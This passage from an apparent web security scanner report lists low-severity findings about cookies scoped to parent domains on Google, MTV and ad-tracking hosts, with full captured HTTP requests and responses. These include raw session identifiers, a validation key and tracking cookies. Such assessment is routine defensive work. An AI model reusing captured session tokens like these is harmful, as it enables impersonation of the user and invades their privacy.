Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAIgAigCML3h1-8EEI_k1-8EGAI.; sess=1; uuid2=3420415245200633085; anj=Kfw)kByDuq(0vd+Be?5ZYTL)6.Z_6mLSHG^$Mglg7#[eC>jObf2zwmy_oS8-DXm*e#>#0f>d3dZ=.Yf*)KU:U06d*R.fph)H_wIT9tRpFa)wUT%mqW=pRsdqVv^RF35%n_Q^:cpr5ep:RI:d*Q]f*6TZ7orR1p>8.+e)7*ulP*$_/_codqSeTnPQP>ZAM@XtL54/JwQXp<6KdREg2=QaT_OW[I42DxyO0vuNdNH@YTHm9X@yt6*5*g%I1Qogv>8Tq%`QThqXzX=qcs%<gmwvgLpBvf_=fChnMmU8k-#bbkuvJg0W]L97!dw7-v:u(ugyd@(tyCzwAAbn#Z-w+U$[l:HEk@p52BEi]D@rNU2*+8*q>gQUqilVQggO[9ko.+?0i9M%Z?fQ69!SL$R`$t1n`NOCsZDnKfGRzP1Tlv(Rm(rKjW:hQtUqx_fbU.aM-m2s4huR<#1^A`tC'$O<aF7UI]Ro.hJ6Sm0@f*ktpgb!A_nBuSF%QuE</hv':wljA`MQbZvif8=xqil`6Rz0pB?RJHsX>UaDhJ[n::w6[afW'UlLx<[-=+iah4q>_UvmARnpCX4V761C=7wjlk%y8'o6yv9Jw2H=bBcvjQL5ie-mjik?DfGaDBk*Ydu!6yDm!cY$lIpJzm32kCFms?p

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 15-Jun-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 12-Sep-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%D>7)*0s]#%2L_'x%SEV/i#+U=4FO?KN1Ipz=Rr7(nTDn(:^i3A^y9mc%vk4^v$yM3WW6G<5`8#q8qLS%.Gg5e[?T1^Q#wfy+>=#D+$s`c#5ht?N!q[ZAHZ1Z1V/eu[*/Lv_57vy>OW./Lt5m[$+zzJenmsrKKAYXY`g:YsVsRgpK'OF`E!2(vac7eTsJ$24IKN+:vi0p2Vw4z^5M5[-UpnshgX'E)?:Y9+`!zXXV<:mwtEQ7$)SP3b`'e-P2$n)w5s#=o9'P(c`e$Y7?glSRJ1YeA-vr%D1[:uhGfeaNS1Lx.ms6'5d'+cbr*E6Tc!h?HlMCRk%]lkUSyLu#SV-)Ax5ikFBZe2^P('_rT)@y#bYwYoQWP[ekHnv4HBG!+W`^U(PHl:.wS<.iz$y+4Gd381>KYR8T$Pjtfc^V%wXDg:0]U!eVN)1?<Z^c?JYo]/qhGM9X+'[fL+NZDCegZnJmSKU0a.$PdC?@$<jBMMo5fRkmrTk]$1htod7UqFe1dz[=3cygdZJ5[m5*(Gc8br6EepfNh/G4MU[p3v$dot(NR$Ib:q[knP3F[/3vuc#>n6L[FU>fwd8x5<=ydvf=+HjP^G2Z; path=/; expires=Mon, 12-Sep-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/pixel?adv=95413&t=2&id=1203653&id=1203654&id=1203953
Date: Tue, 14 Jun 2011 12:02:42 GMT
Content-Length: 0


11.19. http://id.google.com/verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Chordiant+Software
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=CQ41ekAkoyKhsSxp7Lsvf31W-xozO2BEa-Kufadz=x2vqM3hRhyIc_Jyf; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=oYl1reOuxXNi23oTvJQZ0t3G5szxhjVfMpw07OrS=ptCSwDYFJF_6ZZ3q; expires=Wed, 14-Dec-2011 12:27:46 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 14 Jun 2011 12:27:46 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.20. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imx.mtv.com
Path:   /sitewide/droplets/view_gen.jhtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/droplets/view_gen.jhtml?itemUrl=cms_item%3A%2F%2Fwww.mtv.com%2F10325912&tagParams=tag_action%3Dviewed%26 HTTP/1.1
Host: imx.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 0
Content-Type: text/html
Set-Cookie: app-instance=mtv-com-1-mtv-jboss-030; Path=/
Set-Cookie: MTV_ID=209.18.38.157.1308010817621; Domain=.mtv.com; Expires=Fri, 11-Jun-2021 00:20:17 GMT; Path=/
Set-Cookie: JSESSIONID=D48ED7EDF023D65652E97D5F0EF7CFA9.mtv-jboss-029-811-mtvi-com-34851; Path=/
MTVi-Edge-control: bust-downstream
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:20:17 GMT
Connection: close
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:03 GMT


11.21. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07608 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=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; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzUJZjpr3tvXN5oCW8iE3o5lcCzapr7ZyPuzNqEiwsqAs3Z5CT4uCSvFPNQT0hWb+Ql7PLFkrHPAMBJEo8+CkW6yZjLuUwUDDGjJbUeoctczcWYDPi1co/UrWk+TMrIYVFaVlL1f/I1es2gigmjI4FoB644gHJSv8ywcjnyWu9H1qcq4/KgDv7jT4l6HLBoL9mlZmIFDULYF30VFqS9iKgTxNb5I+i0fFWGJT9f7sr0idgWhgiS4mXOfDq3aB46SMfm3ZRQ5fFaWV+95sPMNVUDZWYcqKbr9kVhlQKIKWOGTSV0vOQyWYF7ubKYkaWarYa2dI++2rB+2rl7wGE2LJlxZzF/juUKMEt6FABNvEtf/qhAkjq9eJ5IADHfRkoUTfuIBvds5S3DEr5mYmBk+Apz1PPsClTtHxRDOFlSRcDEv1wH6VNa+ki8I2nSSEqyVuB7LNduVG4PA8V7TxGNyxJVFRu4YwI9UehDB5UDx6RGLe0FmPuNMd8e7K7TQnbhVAQxUnLFQn6Ii1mwBDQeb3Uq1Zu3F2wIxOTz+jpG4jOG+LWWYDyYCsIHC9p1g0b+GmEUm8lUKR9yEvewLaFLR1m21EnT/MbUFivgKAszsmcA5zu/WgTtgEYhKwu20XGcEUhQMJ1Y5Kic5oH920rTK3RGHpLjXbwtgtNZqzTDvB58Q6b59slhpT11735wwv8G0Oo0BprsyhGYi8CsOz3PRCE4B/EzwCh4/ODdgun/LXdPMd6rWgDCoYf1Yf6ySHlcPvLFqpYvF4iT2c0k2m5LKUR87oInvBtChPLnLfHzpYtVOcP2lL+sGlPgezgm6tz+Nqo/ezeRR35eQ8TW6X1qW3UyjhlZU8YsCGj5fpA59zHKSXX22XDarighLu7tHyJX//083MZD7ViaS5T9nioSmnSRSCxiHJ6m3hv+77QHHBrSVnbVasAFdhBzrV9NMkTOe01D+7D++gOCMTT9kawU2P6TU64dVQ4OmUp/Z7K9/32TvfZ7HpQ7/sLr1aNNgh6dyZ9v8HgvncVNuk9zGFtkmnsD9Pkcco+e6EzPGlVnRzFXnJYCkiss4DShHiSg2BogjsbxHeaXEG+W67RFbZV2oxnDuimimm/HM8kilggj+OFaf/qq7tRERvg5pg1FHxhW10mkrhl1nmwscrAHLZBTQqKcky4S0zbzLqJebiuS9dkKTI5DDWLOWhgSFXWe7KigsFgL+mQtJ1o978mcSFvXlHa/a0Tn2Vu5eFfpk5lS0Ih+rFfctHKxSm3u1j8DPmj8S1tqWZ9QvVzReIUJrMk5fOnN8Vqb/H3V3D4ZROw3sbjcYtSgqximbxQfQSj3lIisX2t72VUa1r1Zs1aTMDK1ZcwAXrqio8fTEq5AssvxURgczC5+RAhu9oUwBS6Tb8wl70h4xV5Th9OakL0D1SUsz0xz9CVILvwIDLb0m5Ayf1H7maqNBLHW0pvH3pvLze9Rd+Kb9mq7F5LGa0zzQq0HRkMdgLkO0mCRtv9p5Q2AcIbwFr9thI6XR7IXNML3UeMIY2Axy1Wn1pcsnWQGgwbj8JZ9MhQtL+9OGHZeuFXoGqSPzVgFcCMf+YeFuCkNYhko2nLdHkEButXE3cwD9UPwrpd8KjXWIxmqkN0cNoHKxc2aZWiZ1NiVrqHqpif7KcNBwHl4WFFsrRB1RskjRoztAw0fVZg8TYBwhewZmaJPKU0rM8lceRMYvFDAyNUAbc/RsuG8E7JsBNn7r64w9W7ZI9DosKWm2SGlHQLqDcK9ZKWKcadoRzYI=; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:54 GMT; Path=/
